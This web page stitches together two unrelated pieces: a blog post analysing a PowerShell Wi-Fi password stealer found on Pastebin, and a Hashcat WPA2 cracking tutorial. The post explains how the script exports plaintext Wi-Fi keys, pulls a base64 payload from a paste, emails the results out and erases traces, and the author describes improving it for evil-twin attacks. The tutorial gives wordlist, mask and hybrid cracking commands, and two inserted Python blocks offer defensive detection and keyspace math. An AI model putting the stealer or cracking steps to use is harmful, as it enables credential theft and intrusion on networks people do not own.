Wifi Password Txt

Yesterday afternoon I discovered that Pastebin has what they call the Pastes Archive, which is just a listing of the last 20 or so things people have uploaded, and given the popularity of the site this means you can kind of just sit there and refresh every minute and get something new. I was honestly surprised by the amount of text-based porn ads someone had set up a bot to post, along with fan fiction writing, someone's bash file for installing build-essentials twice (???), and a wide variety of scripts, functions, and lots of hello worlds. It was a fun time killer and I figured maybe if I revisit this from time to time I would actually get something useful out of it and I wouldn't get sucked into it for over an hour like I do on /r/CatsWhoYell.

What’s on Pastebin this morning?

This morning when I woke up I still had the page open so I refreshed to see what would pop up.

And apparently I’m a lucky man because 19 seconds prior to me refreshing someone posted a file conspicuously named wifi.PS1

This is for educational purposes DO NOT do this to a machine you do not have permission on!

Now then a PS1 file typically signifies it’s going to be run in PowerShell and if someone is posting a PowerShell file named “wifi” it can really mean only a few things.

  1. Someone got tired of configuring the Wi-Fi on all the PCs in a building and wrote a script to do it so they could quickly apply it
  2. Someone wrote a script for doing the typical troubleshooting steps for Wi-Fi for them
  3. Someone needs the MAC address so that they can whitelist the machine on the network
  4. Someone needs to extract the Wi-Fi information from a machine

Well, we got #4, but if someone has #2 please email me because I could use a script for that on my relatives' machines.

As a quick aside from someone who mostly uses bash-based terminals in Linux, PowerShell has a lot of the same command names, unlike CMD, which is part of why Microsoft would prefer it if we all forgot about CMD.

Let’s walk through this script:

  1. It's changing directory to root (the C drive, for example), then making a directory called x64 and entering it
  2. It uses wget to download another Pastebin file (raw gives you the raw text) and stores it as wifi.bat
  3. Now it runs the wifi.bat file
  4. Remove-ItemProperty is a command for clearing a Windows Registry entry; in this script they are clearing RunMRU, which stands for "Run Most Recently Used" and is the history keeper for commands run via Start. They are also telling it to do it based on Name with a wildcard (*), and if any error is encountered it should suppress the error and move on

As an example here is my RunMRU

This is the part where things get interesting, that raw Pastebin is actually being obfuscated!

I know this is not a one way hash and it has to be something PowerShell can actually interpret without doing any complex decoding. It’s clearly not hex which leaves us with the next most common candidate, base64.

So I open up good ol CyberChef and throw the blob into the input and drag over “From Base64” and ta da we get our batch file!

So let’s walk through this:

  1. netsh wlan export profile key=clear is a really cool command that dumps your Wi-Fi information, including the plaintext password, to an XML file inside whatever directory you are in.
  2. This is printing a message into a file called wifipass.txt (more on who Exploitech is later)
  3. These next four lines are parsing every .xml file in the folder and appending it to the wifipass.txt file
  4. This next section is for sending the wifipass.txt file to themselves. It's pretty straightforward: they establish that they wish to connect to the Gmail SMTP server, provide the login credentials, attach wifipass.txt, then send the email. I've swapped out their credentials for some fake ones.
  5. Remove the XML files along with two files called w.txt and w.PS1, then wipe the RunMRU
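From the defender's side, the chain walked through above leaves a recognisable trail in process command-line logging. The following is an added example (not code from the post or from the script it analyses) that matches the three indicators the walkthrough names against constructed command-line events and flags hosts where more than one of them fires; the host names, paste URL and event lines are made up.

```python
import re
from collections import defaultdict

# Indicators taken from the walkthrough above: the profile export with
# key=clear, the RunMRU history wipe, and pulling a raw paste into a script.
INDICATORS = {
    "wlan_profile_export_cleartext": re.compile(
        r"netsh\s+wlan\s+export\s+profile\b.*\bkey=clear", re.I),
    "runmru_history_wipe": re.compile(
        r"Remove-ItemProperty\b.*\bRunMRU\b", re.I),
    "raw_paste_to_script": re.compile(
        r"pastebin\.com/raw/\S+.*\.(?:bat|ps1)\b", re.I),
}


def match_indicators(cmdline):
    """Return the names of every indicator that fires on one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def suspicious_hosts(events):
    """Group indicator hits per host. A single 'netsh wlan export profile'
    is routine admin work; a host showing two or more distinct indicators
    reproduces the chain described above and is worth triage."""
    hits = defaultdict(set)
    for host, cmdline in events:
        for name in match_indicators(cmdline):
            hits[host].add(name)
    return {host: sorted(names) for host, names in hits.items() if len(names) >= 2}


# Constructed sample events (host, command line); placeholder paste id.
SAMPLE_EVENTS = [
    ("WS01", "powershell wget https://pastebin.com/raw/PLACEHOLDER -OutFile wifi.bat"),
    ("WS01", "netsh wlan export profile key=clear"),
    ("WS01", "powershell Remove-ItemProperty "
             "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU "
             "-Name * -ErrorAction SilentlyContinue"),
    ("WS02", "netsh wlan show interfaces"),
    ("WS03", "netsh wlan export profile name=Office folder=C:\\backup"),
]

if __name__ == "__main__":
    for host, names in suspicious_hosts(SAMPLE_EVENTS).items():
        print(host, names)
```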

However, this does not work!

The issue is that they are saving and executing wifi.bat as a batch file, however

will only work in Powershell.

I made a defanged version of the script that removes the emailing portion and cleanup to demonstrate.

As you can see, wifipass.txt is empty except for that initial echo header text. If we run the batch file on its own we see the following

However this can be easily corrected to run properly by renaming it to wifiExtract.PS1 and modifying our execution script

Now that I had this I started wondering:

  1. Who is Exploitech
  2. Why is someone using a broken payload

A quick Google search made it clear pretty quickly

Watching the video it’s easy to see that originally Exploitech had meant for the obfuscated code to be executed as such

The person who made the one I found had simply been incapable of actually following directions or had decided they wanted to modify it in their own way but they didn’t really know what they were doing.

Making it Better

So this set of scripts is pretty cool but I think I could make them better.

I made a fork which you can find here on GitHub.

Explorer.PS1

SystemDriver.PS1

Example Output

So what did I change?

For starters, they're using rm, which doesn't fully delete the file; it only sends it to the Windows Recycle Bin. Instead of using rm I used Remove-Item, which will delete an item and bypass the Recycle Bin. So now the script fully cleans up after itself.

Next, I did not like the odd use of a batch file. Watching the video, they for some reason decided to post the Base64 blob plus the lines to decode it in the same Pastebin post, which meant there was nothing really being obfuscated, as anyone who downloaded and ran the paste as a batch file would get the non-obfuscated version… So now it is configured such that you just host the raw base64 blob somewhere like Pastebin and it will download that and save it as a text file, which it will then convert to its UTF-8 form and write back into a PowerShell file, followed by executing it.

Inside the SystemDriver.PS1 I had it grab two extra lines of information from the profile export, the authentication and encryption methods. That way you can make sure you configure your settings before attempting to connect to any Wi-Fi point or if you want to try and do an evil twin attack. Which leads to my next feature for the output which was adding the driver information for wlan so you could see what hardware the computer has if you wanted to use it as a Wi-Fi hotspot for either yourself or as an evil twin access point.

Finally, I updated the formatting of the SMTP section simply because it looked messy and I didn't like entering the same info multiple times.

I have some ideas on how to maybe further flesh this out but it might actually be best to turn it into a set of network pentesting related scripts instead of just Wi-Fi.

Hopefully if you made it this far you enjoyed the post and learned something like I did, if you’re curious about why it is Wi-Fi passwords are stored like this I asked on the security StackExchange and got back some great answers!

Until next time,

Jesse “Wazanator” Culver

For the most part, aircrack-ng is ubiquitous for Wi-Fi and network hacking. But in this article we will dive into another tool, Hashcat, the self-proclaimed world's fastest password recovery tool. It had a proprietary code base until 2015, but is now released as free and open source software. Versions are available for Linux, OS X, and Windows and come in CPU-based or GPU-based variants.

What is different between aircrack-ng and hashcat?

Basically, Hashcat is a tool that uses the graphics card to brute force a password hash instead of using your CPU. It is fast and extremely flexible, and the writer made it in such a way that it allows distributed cracking. aircrack-ng can only work with a dictionary, which severely limits its functionality, while oclHashcat also has a rule-based engine.

Before we go through it, I just want to mention that in some cases you need to use a wordlist, which is a text file containing a collection of words for use in a dictionary attack. You also need to install or update the GPU driver on your machine before moving on.

Setup environment

Suppose this process is carried out on Windows. First, to perform a GPU-based brute force on a Windows machine you'll need:

Then:

  • You need to go to the home page of Hashcat to download it at: https://hashcat.net/hashcat/
  • Then navigate to the location where you downloaded it and unzip it; on a Windows or Linux machine you can use 7-Zip, for OS X you should use The Unarchiver.
  • Open up your Command Prompt/Terminal and navigate to the folder that you unzipped. If you aren't familiar with the command prompt yet, check out this article.
  • Run the executable file by typing hashcat32.exe or hashcat64.exe, depending on whether your computer is 32- or 64-bit (type make if you are using macOS).

WPA2 dictionary attack using Hashcat

Open cmd and change to the Hashcat directory, copy in the .hccapx file and wordlists, and simply type in cmd

Here I have an NVIDIA graphics card, so I use the CudaHashcat command followed by 64, as I am using the Windows 10 64-bit version. Yours will depend on the graphics card you are using and your Windows version (32/64).

cudaHashcat64.exe = The program. In the same folder there's a cudaHashcat32.exe for 32-bit OS and cudaHashcat32.bin / cudaHashcat64.bin for Linux. Use oclHashcat*.exe for AMD graphics cards.

-m 2500 = The specific hashtype. 2500 means WPA/WPA2.

In case you forget the WPA2 code for Hashcat.

Windows CMD: cudaHashcat64.exe --help | find "WPA"

Linux Terminal: cudaHashcat64.bin --help | grep "WPA"

It will show you the line containing “WPA” and corresponding code.

Handshake-01.hccap = The converted *.cap file.

wordlist.txt wordlist2.txt = The wordlists; you can add as many wordlists as you want. To simplify it a bit, every wordlist you make should be saved in the CudaHashcat folder.

After executing the command you should see a similar output:

Wait for Hashcat to finish the task. You can pass multiple wordlists at once so that Hashcat will keep testing the next wordlist until the password is matched.

WPA2 Mask attack using Hashcat

As mentioned earlier, the Mask attack is a replacement for the traditional brute-force attack in Hashcat, giving better and faster results.

Let's have a look at what a Mask attack really is.

In Terminal/cmd type:

  • cudaHashcat64.exe -m 2500 <rootsh3ll-01.hccapx> -a 3 ?d?l?u?d?d?d?u?d?s?a

-a 3 is the Attack mode, custom-character set (Mask attack)

?d?l?u?d?d?d?u?d?s?a is the character set we passed to Hashcat. Let's understand it in a bit more detail:

  • What is a character set in Hashcat?
  • Why is it useful?

What is a character set in Hashcat?

?d ?l ?u ?d ?d ?d ?u ?d ?s ?a = a 10-character WPA key made of letters, digits and symbols. A WPA key can be 8 to 63 characters long.

The above text string is called the "Mask". Every ?x pair used in the above example translates into one character drawn from the corresponding set, which can be a letter, a digit or a special character.

To remember them, just look at the letter used to describe the charset:

?d: For digits

?s: For Special characters

?u: For Uppercase alphabets

?l: For Lowercase alphabets

?a: all of the above.

Simple, isn't it?

Here is the actual character set which tells exactly about what characters are included in the list:

Here are a few examples of how the PSK would look like when passed a specific Mask.

PSK = ?d?l?u?d?d?d?u?d?s?a

0aC575G2/@
9zG432H0*K
8sA111W1$4
3wD001Q5+z

So now you should have a good understanding of the mask attack, right?

Let’s dig a bit deeper now.

Mixing Mask attack with Custom characters.

Let's say we somehow came to know part of the password. It would then be better to put that known part into the attack and let Hashcat randomize only the remaining part, wouldn't it?

Sure! It is very simple. Just put the known characters in their positions and fill the rest with the Mask.

Here ?d ?l 123 ?d ?d ?u ?d C is the custom Mask attack we used: the first two characters are set as a digit and a lowercase letter, followed by the known "123", then "?d ?d ?u ?d", and finally ending with "C", which I already knew.

What we have actually done is simply place the characters we knew in their exact positions and mask the unknown characters, leaving it to Hashcat to test the rest.

Here is one more example for the same:

Let's say the password is "Hi123World" and I only know the "Hi123" part of the password, and the remaining characters are lowercase letters. Assume the length of the password to be 10.

So I would simply use the command below

Where ?u will be replaced by uppercase letters, one by one, until the password is matched or the possibilities are exhausted.

Moving on even further with the Mask attack, i.e. the Hybrid attack.

In a hybrid attack we don't pass any specific string to Hashcat manually, but automate it by passing a wordlist to Hashcat.

Hashcat picks up the words one by one and tests each of them against every candidate the Mask defines.

Example:

  • cudaHashcat64.exe -m 2500 handshake.hccapx -a 1 password.txt ?d?l?d?l

-a 1 : The hybrid attack
password.txt : wordlist
?d?l?d?l = Mask (4 letters and numbers)

The wordlist contains 4 words.

Now it will use the words and combine it with the defined Mask and output should be this:

carlos2e1c
bigfoot0h1d
guest5p4a
onion1h1h

It is cool that you can even reverse the order of the mask, meaning you can simply put the mask before the text file. Hashcat will then brute force the passwords like this:

8j3abigfoot
0t3wguest
6a5jonion
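The mask, custom-mask and hybrid sections above all come down to the same arithmetic: each ?x position multiplies the keyspace by the size of its charset, a literal character contributes exactly one choice, and a hybrid run multiplies that by the wordlist size. The following is an added example (not code from the article or from Hashcat) that parses a mask using Hashcat's built-in charset definitions, computes the keyspace, checks whether a candidate such as the PSKs listed above actually fits a mask, and turns a keyspace into a worst-case running time at an assumed hash rate; it is the check a defender would use to judge how exposed a given password pattern is.

```python
import string

# Hashcat's built-in charsets; ?a is ?l?u?d?s, 95 characters in total.
CHARSETS = {
    "l": string.ascii_lowercase,      # 26
    "u": string.ascii_uppercase,      # 26
    "d": string.digits,               # 10
    "s": " " + string.punctuation,    # 33
}
CHARSETS["a"] = "".join(CHARSETS[k] for k in "luds")


def expand_mask(mask):
    """One allowed-character string per position of a mask such as
    ?d?l123?d?d?u?dC; characters outside a ?x pair are literals and
    ?? stands for a literal question mark, as in Hashcat."""
    positions, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            nxt = mask[i + 1]
            positions.append(CHARSETS[nxt] if nxt in CHARSETS else nxt)
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def keyspace(mask):
    """Number of distinct candidates the mask describes."""
    n = 1
    for allowed in expand_mask(mask):
        n *= len(allowed)
    return n


def matches_mask(candidate, mask):
    """True when the candidate is one of the strings the mask would produce."""
    positions = expand_mask(mask)
    return len(candidate) == len(positions) and all(
        c in allowed for c, allowed in zip(candidate, positions))


def hybrid_keyspace(words, mask):
    """Candidates for a hybrid (-a 1) run: every word gets every mask fill."""
    return len(words) * keyspace(mask)


def hours_at_rate(candidates, hashes_per_second):
    """Worst-case hours to exhaust a keyspace at an assumed cracking rate."""
    return candidates / hashes_per_second / 3600
```

For example, hours_at_rate(keyspace("?d?l?u?d?d?d?u?d?s?a"), 100000) shows that even at an assumed 100 kH/s the 10-character mask above takes millions of hours to exhaust, while a 4-character mask after a known word falls in seconds.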

You're getting the idea now, right?

Using many dictionaries at once, long Masks or Hybrid+Mask runs takes a long time to complete. It is not possible for everyone to keep the system on every time and not use it for personal work, and the Hashcat developers understand this problem very well. So they came up with a brilliant solution which no other password recovery tool offers built in at this moment: the Pause/Resume feature.

WPA2 Cracking Pause/resume in Hashcat (One of the best features)

This feature can be used anywhere in Hashcat. It isn't limited to WPA2 cracking; it also applies if you are cracking MD5, SHA1, OS X or WordPress hashes. As soon as the process is in the running state you can pause/resume it at any moment.

Just press [p] to pause the execution and continue your work.

To resume, press [r]. All the commands are listed at the end of the output during task execution. See the image below.

You might sometimes feel this feature is a limitation, as you still have to keep the system awake so that the process doesn't get cleared from memory.

And we have a solution for that too. Create session!

WPA2 Cracking save Sessions and Restore.

Creating and restoring sessions with hashcat is Extremely Easy.

Just add --session at the end of the command you want to run, followed by the session name.

Example:

Here I named the session "blabla". You can see in the image below that Hashcat has saved the session under that name, i.e. blabla, and is running.

Now you can simply press [q], close cmd, shut down the system, come back after a holiday, turn the system on and resume the session. That easy!

NOTE: Once execution is completed session will be deleted.

How to restore?

Add --restore to the above command. Here it goes:

Hashcat will now check in its working directory for any session previously created and simply resume the Cracking process.

Simple enough? Yes it is.

This is all for Hashcat. I hope you understood it well and followed along. No need to be sad if you don't have enough money to buy those expensive graphics cards for this purpose; you can still try cracking the passwords at high speed using the cloud. You just have to pay accordingly.

To specify the device, use the -d argument and the number of your GPU.
The command should look like this in the end:

Example:

Where Handshake.hccapx is my handshake file and eithdigit.txt is my wordlist. You need to convert the .cap file to .hccapx using https://hashcat.net/cap2hccapx/

This article is referred from rootsh3ll.com.